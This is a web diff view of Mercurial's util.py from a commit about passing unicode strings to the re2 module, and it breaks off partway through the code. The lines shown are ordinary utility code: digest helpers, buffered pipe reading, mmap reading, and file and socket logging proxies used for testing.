re2: feed unicode string to re2 module when necessary...
marmoute
r47597:3ff35382 default draft
@@ -1,3730 +1,3741 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import locale
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37
38 38 from .thirdparty import attr
39 39 from .pycompat import (
40 40 delattr,
41 41 getattr,
42 42 open,
43 43 setattr,
44 44 )
45 45 from .node import hex
46 46 from hgdemandimport import tracing
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 policy,
52 52 pycompat,
53 53 urllibcompat,
54 54 )
55 55 from .utils import (
56 56 compression,
57 57 hashutil,
58 58 procutil,
59 59 stringutil,
60 60 )
61 61
62 62 if pycompat.TYPE_CHECKING:
63 63 from typing import (
64 64 Iterator,
65 65 List,
66 66 Optional,
67 67 Tuple,
68 68 Union,
69 69 )
70 70
71 71
72 72 base85 = policy.importmod('base85')
73 73 osutil = policy.importmod('osutil')
74 74
75 75 b85decode = base85.b85decode
76 76 b85encode = base85.b85encode
77 77
78 78 cookielib = pycompat.cookielib
79 79 httplib = pycompat.httplib
80 80 pickle = pycompat.pickle
81 81 safehasattr = pycompat.safehasattr
82 82 socketserver = pycompat.socketserver
83 83 bytesio = pycompat.bytesio
84 84 # TODO deprecate stringio name, as it is a lie on Python 3.
85 85 stringio = bytesio
86 86 xmlrpclib = pycompat.xmlrpclib
87 87
88 88 httpserver = urllibcompat.httpserver
89 89 urlerr = urllibcompat.urlerr
90 90 urlreq = urllibcompat.urlreq
91 91
92 92 # workaround for win32mbcs
93 93 _filenamebytestr = pycompat.bytestr
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 else:
98 98 from . import posix as platform
99 99
100 100 _ = i18n._
101 101
102 102 bindunixsocket = platform.bindunixsocket
103 103 cachestat = platform.cachestat
104 104 checkexec = platform.checkexec
105 105 checklink = platform.checklink
106 106 copymode = platform.copymode
107 107 expandglobs = platform.expandglobs
108 108 getfsmountpoint = platform.getfsmountpoint
109 109 getfstype = platform.getfstype
110 110 groupmembers = platform.groupmembers
111 111 groupname = platform.groupname
112 112 isexec = platform.isexec
113 113 isowner = platform.isowner
114 114 listdir = osutil.listdir
115 115 localpath = platform.localpath
116 116 lookupreg = platform.lookupreg
117 117 makedir = platform.makedir
118 118 nlinks = platform.nlinks
119 119 normpath = platform.normpath
120 120 normcase = platform.normcase
121 121 normcasespec = platform.normcasespec
122 122 normcasefallback = platform.normcasefallback
123 123 openhardlinks = platform.openhardlinks
124 124 oslink = platform.oslink
125 125 parsepatchoutput = platform.parsepatchoutput
126 126 pconvert = platform.pconvert
127 127 poll = platform.poll
128 128 posixfile = platform.posixfile
129 129 readlink = platform.readlink
130 130 rename = platform.rename
131 131 removedirs = platform.removedirs
132 132 samedevice = platform.samedevice
133 133 samefile = platform.samefile
134 134 samestat = platform.samestat
135 135 setflags = platform.setflags
136 136 split = platform.split
137 137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 138 statisexec = platform.statisexec
139 139 statislink = platform.statislink
140 140 umask = platform.umask
141 141 unlink = platform.unlink
142 142 username = platform.username
143 143
144 144
145 145 def setumask(val):
146 146 # type: (int) -> None
147 147 '''Update the umask. Used by the chg server.'''
148 148 if pycompat.iswindows:
149 149 return
150 150 os.umask(val)
151 151 global umask
152 152 platform.umask = umask = val & 0o777
153 153
154 154
155 155 # small compat layer
156 156 compengines = compression.compengines
157 157 SERVERROLE = compression.SERVERROLE
158 158 CLIENTROLE = compression.CLIENTROLE
159 159
160 160 try:
161 161 recvfds = osutil.recvfds
162 162 except AttributeError:
163 163 pass
164 164
165 165 # Python compatibility
166 166
167 167 _notset = object()
168 168
169 169
170 170 def bitsfrom(container):
171 171 bits = 0
172 172 for bit in container:
173 173 bits |= bit
174 174 return bits
175 175
176 176
177 177 # Python 2.6 still has deprecation warnings enabled by default. We do not
178 178 # want to display anything to standard users, so detect if we are running
179 179 # tests and only enable Python deprecation warnings in that case.
180 180 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
181 181 if _dowarn:
182 182 # explicitly unfilter our warning for python 2.7
183 183 #
184 184 # The option of setting PYTHONWARNINGS in the test runner was investigated.
185 185 # However, the module name set through PYTHONWARNINGS is matched exactly,
186 186 # so we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'.
187 187 # This makes the whole PYTHONWARNINGS approach useless for our use case.
188 188 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
189 189 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
190 190 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
191 191 if _dowarn and pycompat.ispy3:
192 192 # silence warning emitted by passing user string to re.sub()
193 193 warnings.filterwarnings(
194 194 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
195 195 )
196 196 warnings.filterwarnings(
197 197 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
198 198 )
199 199 # TODO: reinvent imp.is_frozen()
200 200 warnings.filterwarnings(
201 201 'ignore',
202 202 'the imp module is deprecated',
203 203 DeprecationWarning,
204 204 'mercurial',
205 205 )
206 206
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += (
215 215 b"\n(compatibility will be dropped after Mercurial-%s,"
216 216 b" update your code.)"
217 217 ) % version
218 218 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
219 219 # on python 3 with chg, we will need to explicitly flush the output
220 220 sys.stderr.flush()
221 221
222 222
223 223 DIGESTS = {
224 224 b'md5': hashlib.md5,
225 225 b'sha1': hashutil.sha1,
226 226 b'sha512': hashlib.sha512,
227 227 }
228 228 # List of digest types from strongest to weakest
229 229 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
230 230
231 231 for k in DIGESTS_BY_STRENGTH:
232 232 assert k in DIGESTS
233 233
234 234
235 235 class digester(object):
236 236 """helper to compute digests.
237 237
238 238 This helper can be used to compute one or more digests given their name.
239 239
240 240 >>> d = digester([b'md5', b'sha1'])
241 241 >>> d.update(b'foo')
242 242 >>> [k for k in sorted(d)]
243 243 ['md5', 'sha1']
244 244 >>> d[b'md5']
245 245 'acbd18db4cc2f85cedef654fccc4a4d8'
246 246 >>> d[b'sha1']
247 247 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
248 248 >>> digester.preferred([b'md5', b'sha1'])
249 249 'sha1'
250 250 """
251 251
252 252 def __init__(self, digests, s=b''):
253 253 self._hashes = {}
254 254 for k in digests:
255 255 if k not in DIGESTS:
256 256 raise error.Abort(_(b'unknown digest type: %s') % k)
257 257 self._hashes[k] = DIGESTS[k]()
258 258 if s:
259 259 self.update(s)
260 260
261 261 def update(self, data):
262 262 for h in self._hashes.values():
263 263 h.update(data)
264 264
265 265 def __getitem__(self, key):
266 266 if key not in DIGESTS:
267 267 raise error.Abort(_(b'unknown digest type: %s') % key)
268 268 return hex(self._hashes[key].digest())
269 269
270 270 def __iter__(self):
271 271 return iter(self._hashes)
272 272
273 273 @staticmethod
274 274 def preferred(supported):
275 275 """returns the strongest digest type in both supported and DIGESTS."""
276 276
277 277 for k in DIGESTS_BY_STRENGTH:
278 278 if k in supported:
279 279 return k
280 280 return None
281 281
282 282
283 283 class digestchecker(object):
284 284 """file handle wrapper that additionally checks content against a given
285 285 size and digests.
286 286
287 287 d = digestchecker(fh, size, {'md5': '...'})
288 288
289 289 When multiple digests are given, all of them are validated.
290 290 """
291 291
292 292 def __init__(self, fh, size, digests):
293 293 self._fh = fh
294 294 self._size = size
295 295 self._got = 0
296 296 self._digests = dict(digests)
297 297 self._digester = digester(self._digests.keys())
298 298
299 299 def read(self, length=-1):
300 300 content = self._fh.read(length)
301 301 self._digester.update(content)
302 302 self._got += len(content)
303 303 return content
304 304
305 305 def validate(self):
306 306 if self._size != self._got:
307 307 raise error.Abort(
308 308 _(b'size mismatch: expected %d, got %d')
309 309 % (self._size, self._got)
310 310 )
311 311 for k, v in self._digests.items():
312 312 if v != self._digester[k]:
313 313 # i18n: first parameter is a digest name
314 314 raise error.Abort(
315 315 _(b'%s mismatch: expected %s, got %s')
316 316 % (k, v, self._digester[k])
317 317 )
318 318
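# Illustrative sketch (not part of the module API; names are local to the
# example): driving a digestchecker over an in-memory stream. The expected
# md5 value matches the digester doctest above; validate() raises
# error.Abort on any size or digest mismatch.
def _digestchecker_example():
    import io

    payload = b'foo'
    digests = {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'}
    checker = digestchecker(io.BytesIO(payload), len(payload), digests)
    while checker.read(2):
        pass  # every read goes through the wrapper, so it is digested
    checker.validate()  # a no-op here: size and md5 both match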
319 319
320 320 try:
321 321 buffer = buffer # pytype: disable=name-error
322 322 except NameError:
323 323
324 324 def buffer(sliceable, offset=0, length=None):
325 325 if length is not None:
326 326 return memoryview(sliceable)[offset : offset + length]
327 327 return memoryview(sliceable)[offset:]
328 328
329 329
330 330 _chunksize = 4096
331 331
332 332
333 333 class bufferedinputpipe(object):
334 334 """a manually buffered input pipe
335 335
336 336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 337 the same time. We cannot probe the buffer state and select will not detect
338 338 that data are ready to read if they are already buffered.
339 339
340 340 This class lets us work around that by implementing its own buffering
341 341 (allowing efficient readline) while offering a way to know if the buffer is
342 342 empty from the output (allowing collaboration of the buffer with polling).
343 343
344 344 This class lives in the 'util' module because it makes use of the 'os'
345 345 module from the python stdlib.
346 346 """
347 347
348 348 def __new__(cls, fh):
349 349 # If we receive a fileobjectproxy, we need to use a variation of this
350 350 # class that notifies observers about activity.
351 351 if isinstance(fh, fileobjectproxy):
352 352 cls = observedbufferedinputpipe
353 353
354 354 return super(bufferedinputpipe, cls).__new__(cls)
355 355
356 356 def __init__(self, input):
357 357 self._input = input
358 358 self._buffer = []
359 359 self._eof = False
360 360 self._lenbuf = 0
361 361
362 362 @property
363 363 def hasbuffer(self):
364 364 """True is any data is currently buffered
365 365
366 366 This will be used externally as a pre-step for polling IO. If there is
367 367 already data then no polling should be set in place."""
368 368 return bool(self._buffer)
369 369
370 370 @property
371 371 def closed(self):
372 372 return self._input.closed
373 373
374 374 def fileno(self):
375 375 return self._input.fileno()
376 376
377 377 def close(self):
378 378 return self._input.close()
379 379
380 380 def read(self, size):
381 381 while (not self._eof) and (self._lenbuf < size):
382 382 self._fillbuffer()
383 383 return self._frombuffer(size)
384 384
385 385 def unbufferedread(self, size):
386 386 if not self._eof and self._lenbuf == 0:
387 387 self._fillbuffer(max(size, _chunksize))
388 388 return self._frombuffer(min(self._lenbuf, size))
389 389
390 390 def readline(self, *args, **kwargs):
391 391 if len(self._buffer) > 1:
392 392 # this should not happen because both read and readline end with a
393 393 # _frombuffer call that collapses it.
394 394 self._buffer = [b''.join(self._buffer)]
395 395 self._lenbuf = len(self._buffer[0])
396 396 lfi = -1
397 397 if self._buffer:
398 398 lfi = self._buffer[-1].find(b'\n')
399 399 while (not self._eof) and lfi < 0:
400 400 self._fillbuffer()
401 401 if self._buffer:
402 402 lfi = self._buffer[-1].find(b'\n')
403 403 size = lfi + 1
404 404 if lfi < 0: # end of file
405 405 size = self._lenbuf
406 406 elif len(self._buffer) > 1:
407 407 # we need to take previous chunks into account
408 408 size += self._lenbuf - len(self._buffer[-1])
409 409 return self._frombuffer(size)
410 410
411 411 def _frombuffer(self, size):
412 412 """return at most 'size' data from the buffer
413 413
414 414 The data are removed from the buffer."""
415 415 if size == 0 or not self._buffer:
416 416 return b''
417 417 buf = self._buffer[0]
418 418 if len(self._buffer) > 1:
419 419 buf = b''.join(self._buffer)
420 420
421 421 data = buf[:size]
422 422 buf = buf[len(data) :]
423 423 if buf:
424 424 self._buffer = [buf]
425 425 self._lenbuf = len(buf)
426 426 else:
427 427 self._buffer = []
428 428 self._lenbuf = 0
429 429 return data
430 430
431 431 def _fillbuffer(self, size=_chunksize):
432 432 """read data to the buffer"""
433 433 data = os.read(self._input.fileno(), size)
434 434 if not data:
435 435 self._eof = True
436 436 else:
437 437 self._lenbuf += len(data)
438 438 self._buffer.append(data)
439 439
440 440 return data
441 441
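# Illustrative sketch (not part of the module; names are local to the
# example): pairing bufferedinputpipe with polling. ``hasbuffer`` tells the
# caller whether a poll() is needed before the next read.
def _bufferedinputpipe_example():
    rfd, wfd = os.pipe()
    os.write(wfd, b'one\ntwo\n')
    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    line = pipe.readline()  # b'one\n'; the rest stays buffered
    if not pipe.hasbuffer:
        poll([pipe.fileno()])  # only poll when nothing is buffered
    return line, pipe.read(4)  # b'two\n' comes straight from the buffer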
442 442
443 443 def mmapread(fp, size=None):
444 444 if size == 0:
445 445 # size of 0 to mmap.mmap() means "all data"
446 446 # rather than "zero bytes", so special case that.
447 447 return b''
448 448 elif size is None:
449 449 size = 0
450 450 try:
451 451 fd = getattr(fp, 'fileno', lambda: fp)()
452 452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 453 except ValueError:
454 454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 455 # if the file is empty, and if so, return an empty buffer.
456 456 if os.fstat(fd).st_size == 0:
457 457 return b''
458 458 raise
459 459
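# Illustrative sketch (example helper only): mapping a regular on-disk file
# read-only with mmapread() and slicing it like bytes.
def _mmapread_example(path):
    with open(path, b'rb') as fp:
        data = mmapread(fp)  # b'' for empty files instead of a ValueError
        return bytes(data[:16])  # mmap objects support byte slicing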
460 460
461 461 class fileobjectproxy(object):
462 462 """A proxy around file objects that tells a watcher when events occur.
463 463
464 464 This type is intended to only be used for testing purposes. Think hard
465 465 before using it in important code.
466 466 """
467 467
468 468 __slots__ = (
469 469 '_orig',
470 470 '_observer',
471 471 )
472 472
473 473 def __init__(self, fh, observer):
474 474 object.__setattr__(self, '_orig', fh)
475 475 object.__setattr__(self, '_observer', observer)
476 476
477 477 def __getattribute__(self, name):
478 478 ours = {
479 479 '_observer',
480 480 # IOBase
481 481 'close',
482 482 # closed is a property
483 483 'fileno',
484 484 'flush',
485 485 'isatty',
486 486 'readable',
487 487 'readline',
488 488 'readlines',
489 489 'seek',
490 490 'seekable',
491 491 'tell',
492 492 'truncate',
493 493 'writable',
494 494 'writelines',
495 495 # RawIOBase
496 496 'read',
497 497 'readall',
498 498 'readinto',
499 499 'write',
500 500 # BufferedIOBase
501 501 # raw is a property
502 502 'detach',
503 503 # read defined above
504 504 'read1',
505 505 # readinto defined above
506 506 # write defined above
507 507 }
508 508
509 509 # We only observe some methods.
510 510 if name in ours:
511 511 return object.__getattribute__(self, name)
512 512
513 513 return getattr(object.__getattribute__(self, '_orig'), name)
514 514
515 515 def __nonzero__(self):
516 516 return bool(object.__getattribute__(self, '_orig'))
517 517
518 518 __bool__ = __nonzero__
519 519
520 520 def __delattr__(self, name):
521 521 return delattr(object.__getattribute__(self, '_orig'), name)
522 522
523 523 def __setattr__(self, name, value):
524 524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525 525
526 526 def __iter__(self):
527 527 return object.__getattribute__(self, '_orig').__iter__()
528 528
529 529 def _observedcall(self, name, *args, **kwargs):
530 530 # Call the original object.
531 531 orig = object.__getattribute__(self, '_orig')
532 532 res = getattr(orig, name)(*args, **kwargs)
533 533
534 534 # Call a method on the observer of the same name with arguments
535 535 # so it can react, log, etc.
536 536 observer = object.__getattribute__(self, '_observer')
537 537 fn = getattr(observer, name, None)
538 538 if fn:
539 539 fn(res, *args, **kwargs)
540 540
541 541 return res
542 542
543 543 def close(self, *args, **kwargs):
544 544 return object.__getattribute__(self, '_observedcall')(
545 545 'close', *args, **kwargs
546 546 )
547 547
548 548 def fileno(self, *args, **kwargs):
549 549 return object.__getattribute__(self, '_observedcall')(
550 550 'fileno', *args, **kwargs
551 551 )
552 552
553 553 def flush(self, *args, **kwargs):
554 554 return object.__getattribute__(self, '_observedcall')(
555 555 'flush', *args, **kwargs
556 556 )
557 557
558 558 def isatty(self, *args, **kwargs):
559 559 return object.__getattribute__(self, '_observedcall')(
560 560 'isatty', *args, **kwargs
561 561 )
562 562
563 563 def readable(self, *args, **kwargs):
564 564 return object.__getattribute__(self, '_observedcall')(
565 565 'readable', *args, **kwargs
566 566 )
567 567
568 568 def readline(self, *args, **kwargs):
569 569 return object.__getattribute__(self, '_observedcall')(
570 570 'readline', *args, **kwargs
571 571 )
572 572
573 573 def readlines(self, *args, **kwargs):
574 574 return object.__getattribute__(self, '_observedcall')(
575 575 'readlines', *args, **kwargs
576 576 )
577 577
578 578 def seek(self, *args, **kwargs):
579 579 return object.__getattribute__(self, '_observedcall')(
580 580 'seek', *args, **kwargs
581 581 )
582 582
583 583 def seekable(self, *args, **kwargs):
584 584 return object.__getattribute__(self, '_observedcall')(
585 585 'seekable', *args, **kwargs
586 586 )
587 587
588 588 def tell(self, *args, **kwargs):
589 589 return object.__getattribute__(self, '_observedcall')(
590 590 'tell', *args, **kwargs
591 591 )
592 592
593 593 def truncate(self, *args, **kwargs):
594 594 return object.__getattribute__(self, '_observedcall')(
595 595 'truncate', *args, **kwargs
596 596 )
597 597
598 598 def writable(self, *args, **kwargs):
599 599 return object.__getattribute__(self, '_observedcall')(
600 600 'writable', *args, **kwargs
601 601 )
602 602
603 603 def writelines(self, *args, **kwargs):
604 604 return object.__getattribute__(self, '_observedcall')(
605 605 'writelines', *args, **kwargs
606 606 )
607 607
608 608 def read(self, *args, **kwargs):
609 609 return object.__getattribute__(self, '_observedcall')(
610 610 'read', *args, **kwargs
611 611 )
612 612
613 613 def readall(self, *args, **kwargs):
614 614 return object.__getattribute__(self, '_observedcall')(
615 615 'readall', *args, **kwargs
616 616 )
617 617
618 618 def readinto(self, *args, **kwargs):
619 619 return object.__getattribute__(self, '_observedcall')(
620 620 'readinto', *args, **kwargs
621 621 )
622 622
623 623 def write(self, *args, **kwargs):
624 624 return object.__getattribute__(self, '_observedcall')(
625 625 'write', *args, **kwargs
626 626 )
627 627
628 628 def detach(self, *args, **kwargs):
629 629 return object.__getattribute__(self, '_observedcall')(
630 630 'detach', *args, **kwargs
631 631 )
632 632
633 633 def read1(self, *args, **kwargs):
634 634 return object.__getattribute__(self, '_observedcall')(
635 635 'read1', *args, **kwargs
636 636 )
637 637
638 638
639 639 class observedbufferedinputpipe(bufferedinputpipe):
640 640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641 641
642 642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 643 bypass ``fileobjectproxy``. Because of this, we need to make
644 644 ``bufferedinputpipe`` aware of these operations.
645 645
646 646 This variation of ``bufferedinputpipe`` can notify observers about
647 647 ``os.read()`` events. It also re-publishes other events, such as
648 648 ``read()`` and ``readline()``.
649 649 """
650 650
651 651 def _fillbuffer(self):
652 652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653 653
654 654 fn = getattr(self._input._observer, 'osread', None)
655 655 if fn:
656 656 fn(res, _chunksize)
657 657
658 658 return res
659 659
660 660 # We use different observer methods because the operation isn't
661 661 # performed on the actual file object but on us.
662 662 def read(self, size):
663 663 res = super(observedbufferedinputpipe, self).read(size)
664 664
665 665 fn = getattr(self._input._observer, 'bufferedread', None)
666 666 if fn:
667 667 fn(res, size)
668 668
669 669 return res
670 670
671 671 def readline(self, *args, **kwargs):
672 672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673 673
674 674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 675 if fn:
676 676 fn(res)
677 677
678 678 return res
679 679
680 680
681 681 PROXIED_SOCKET_METHODS = {
682 682 'makefile',
683 683 'recv',
684 684 'recvfrom',
685 685 'recvfrom_into',
686 686 'recv_into',
687 687 'send',
688 688 'sendall',
689 689 'sendto',
690 690 'setblocking',
691 691 'settimeout',
692 692 'gettimeout',
693 693 'setsockopt',
694 694 }
695 695
696 696
697 697 class socketproxy(object):
698 698 """A proxy around a socket that tells a watcher when events occur.
699 699
700 700 This is like ``fileobjectproxy`` except for sockets.
701 701
702 702 This type is intended to only be used for testing purposes. Think hard
703 703 before using it in important code.
704 704 """
705 705
706 706 __slots__ = (
707 707 '_orig',
708 708 '_observer',
709 709 )
710 710
711 711 def __init__(self, sock, observer):
712 712 object.__setattr__(self, '_orig', sock)
713 713 object.__setattr__(self, '_observer', observer)
714 714
715 715 def __getattribute__(self, name):
716 716 if name in PROXIED_SOCKET_METHODS:
717 717 return object.__getattribute__(self, name)
718 718
719 719 return getattr(object.__getattribute__(self, '_orig'), name)
720 720
721 721 def __delattr__(self, name):
722 722 return delattr(object.__getattribute__(self, '_orig'), name)
723 723
724 724 def __setattr__(self, name, value):
725 725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726 726
727 727 def __nonzero__(self):
728 728 return bool(object.__getattribute__(self, '_orig'))
729 729
730 730 __bool__ = __nonzero__
731 731
732 732 def _observedcall(self, name, *args, **kwargs):
733 733 # Call the original object.
734 734 orig = object.__getattribute__(self, '_orig')
735 735 res = getattr(orig, name)(*args, **kwargs)
736 736
737 737 # Call a method on the observer of the same name with arguments
738 738 # so it can react, log, etc.
739 739 observer = object.__getattribute__(self, '_observer')
740 740 fn = getattr(observer, name, None)
741 741 if fn:
742 742 fn(res, *args, **kwargs)
743 743
744 744 return res
745 745
746 746 def makefile(self, *args, **kwargs):
747 747 res = object.__getattribute__(self, '_observedcall')(
748 748 'makefile', *args, **kwargs
749 749 )
750 750
751 751 # The file object may be used for I/O. So we turn it into a
752 752 # proxy using our observer.
753 753 observer = object.__getattribute__(self, '_observer')
754 754 return makeloggingfileobject(
755 755 observer.fh,
756 756 res,
757 757 observer.name,
758 758 reads=observer.reads,
759 759 writes=observer.writes,
760 760 logdata=observer.logdata,
761 761 logdataapis=observer.logdataapis,
762 762 )
763 763
764 764 def recv(self, *args, **kwargs):
765 765 return object.__getattribute__(self, '_observedcall')(
766 766 'recv', *args, **kwargs
767 767 )
768 768
769 769 def recvfrom(self, *args, **kwargs):
770 770 return object.__getattribute__(self, '_observedcall')(
771 771 'recvfrom', *args, **kwargs
772 772 )
773 773
774 774 def recvfrom_into(self, *args, **kwargs):
775 775 return object.__getattribute__(self, '_observedcall')(
776 776 'recvfrom_into', *args, **kwargs
777 777 )
778 778
779 779 def recv_into(self, *args, **kwargs):
780 780 return object.__getattribute__(self, '_observedcall')(
781 781 'recv_into', *args, **kwargs
782 782 )
783 783
784 784 def send(self, *args, **kwargs):
785 785 return object.__getattribute__(self, '_observedcall')(
786 786 'send', *args, **kwargs
787 787 )
788 788
789 789 def sendall(self, *args, **kwargs):
790 790 return object.__getattribute__(self, '_observedcall')(
791 791 'sendall', *args, **kwargs
792 792 )
793 793
794 794 def sendto(self, *args, **kwargs):
795 795 return object.__getattribute__(self, '_observedcall')(
796 796 'sendto', *args, **kwargs
797 797 )
798 798
799 799 def setblocking(self, *args, **kwargs):
800 800 return object.__getattribute__(self, '_observedcall')(
801 801 'setblocking', *args, **kwargs
802 802 )
803 803
804 804 def settimeout(self, *args, **kwargs):
805 805 return object.__getattribute__(self, '_observedcall')(
806 806 'settimeout', *args, **kwargs
807 807 )
808 808
809 809 def gettimeout(self, *args, **kwargs):
810 810 return object.__getattribute__(self, '_observedcall')(
811 811 'gettimeout', *args, **kwargs
812 812 )
813 813
814 814 def setsockopt(self, *args, **kwargs):
815 815 return object.__getattribute__(self, '_observedcall')(
816 816 'setsockopt', *args, **kwargs
817 817 )
818 818
819 819
820 820 class baseproxyobserver(object):
821 821 def __init__(self, fh, name, logdata, logdataapis):
822 822 self.fh = fh
823 823 self.name = name
824 824 self.logdata = logdata
825 825 self.logdataapis = logdataapis
826 826
827 827 def _writedata(self, data):
828 828 if not self.logdata:
829 829 if self.logdataapis:
830 830 self.fh.write(b'\n')
831 831 self.fh.flush()
832 832 return
833 833
834 834 # Simple case writes all data on a single line.
835 835 if b'\n' not in data:
836 836 if self.logdataapis:
837 837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 838 else:
839 839 self.fh.write(
840 840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 841 )
842 842 self.fh.flush()
843 843 return
844 844
845 845 # Data with newlines is written to multiple lines.
846 846 if self.logdataapis:
847 847 self.fh.write(b':\n')
848 848
849 849 lines = data.splitlines(True)
850 850 for line in lines:
851 851 self.fh.write(
852 852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 853 )
854 854 self.fh.flush()
855 855
856 856
857 857 class fileobjectobserver(baseproxyobserver):
858 858 """Logs file object activity."""
859 859
860 860 def __init__(
861 861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 862 ):
863 863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 864 self.reads = reads
865 865 self.writes = writes
866 866
867 867 def read(self, res, size=-1):
868 868 if not self.reads:
869 869 return
870 870 # Python 3 can return None from reads at EOF instead of empty strings.
871 871 if res is None:
872 872 res = b''
873 873
874 874 if size == -1 and res == b'':
875 875 # Suppress pointless read(-1) calls that return
876 876 # nothing. These happen _a lot_ on Python 3, and there
877 877 # doesn't seem to be a better workaround to have matching
878 878 # Python 2 and 3 behavior. :(
879 879 return
880 880
881 881 if self.logdataapis:
882 882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883 883
884 884 self._writedata(res)
885 885
886 886 def readline(self, res, limit=-1):
887 887 if not self.reads:
888 888 return
889 889
890 890 if self.logdataapis:
891 891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892 892
893 893 self._writedata(res)
894 894
895 895 def readinto(self, res, dest):
896 896 if not self.reads:
897 897 return
898 898
899 899 if self.logdataapis:
900 900 self.fh.write(
901 901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 902 )
903 903
904 904 data = dest[0:res] if res is not None else b''
905 905
906 906 # _writedata() uses "in" operator and is confused by memoryview because
907 907 # characters are ints on Python 3.
908 908 if isinstance(data, memoryview):
909 909 data = data.tobytes()
910 910
911 911 self._writedata(data)
912 912
913 913 def write(self, res, data):
914 914 if not self.writes:
915 915 return
916 916
917 917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 918 # returns the integer bytes written.
919 919 if res is None and data:
920 920 res = len(data)
921 921
922 922 if self.logdataapis:
923 923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924 924
925 925 self._writedata(data)
926 926
927 927 def flush(self, res):
928 928 if not self.writes:
929 929 return
930 930
931 931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932 932
933 933 # For observedbufferedinputpipe.
934 934 def bufferedread(self, res, size):
935 935 if not self.reads:
936 936 return
937 937
938 938 if self.logdataapis:
939 939 self.fh.write(
940 940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 941 )
942 942
943 943 self._writedata(res)
944 944
945 945 def bufferedreadline(self, res):
946 946 if not self.reads:
947 947 return
948 948
949 949 if self.logdataapis:
950 950 self.fh.write(
951 951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 952 )
953 953
954 954 self._writedata(res)
955 955
956 956
957 957 def makeloggingfileobject(
958 958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 959 ):
960 960 """Turn a file object into a logging file object."""
961 961
962 962 observer = fileobjectobserver(
963 963 logh,
964 964 name,
965 965 reads=reads,
966 966 writes=writes,
967 967 logdata=logdata,
968 968 logdataapis=logdataapis,
969 969 )
970 970 return fileobjectproxy(fh, observer)
971 971
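# Illustrative sketch (names are local to the example): wrap an in-memory
# file in the logging proxy so each read is echoed to a log handle.
def _makeloggingfileobject_example():
    fh = makeloggingfileobject(
        procutil.stderr, bytesio(b'data'), b'example', logdata=True
    )
    fh.read(2)  # logged roughly as: example> read(2) -> 2: da
    return fh.read()  # b'ta', logged the same way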
972 972
973 973 class socketobserver(baseproxyobserver):
974 974 """Logs socket activity."""
975 975
976 976 def __init__(
977 977 self,
978 978 fh,
979 979 name,
980 980 reads=True,
981 981 writes=True,
982 982 states=True,
983 983 logdata=False,
984 984 logdataapis=True,
985 985 ):
986 986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 987 self.reads = reads
988 988 self.writes = writes
989 989 self.states = states
990 990
991 991 def makefile(self, res, mode=None, bufsize=None):
992 992 if not self.states:
993 993 return
994 994
995 995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996 996
997 997 def recv(self, res, size, flags=0):
998 998 if not self.reads:
999 999 return
1000 1000
1001 1001 if self.logdataapis:
1002 1002 self.fh.write(
1003 1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 1004 )
1005 1005 self._writedata(res)
1006 1006
1007 1007 def recvfrom(self, res, size, flags=0):
1008 1008 if not self.reads:
1009 1009 return
1010 1010
1011 1011 if self.logdataapis:
1012 1012 self.fh.write(
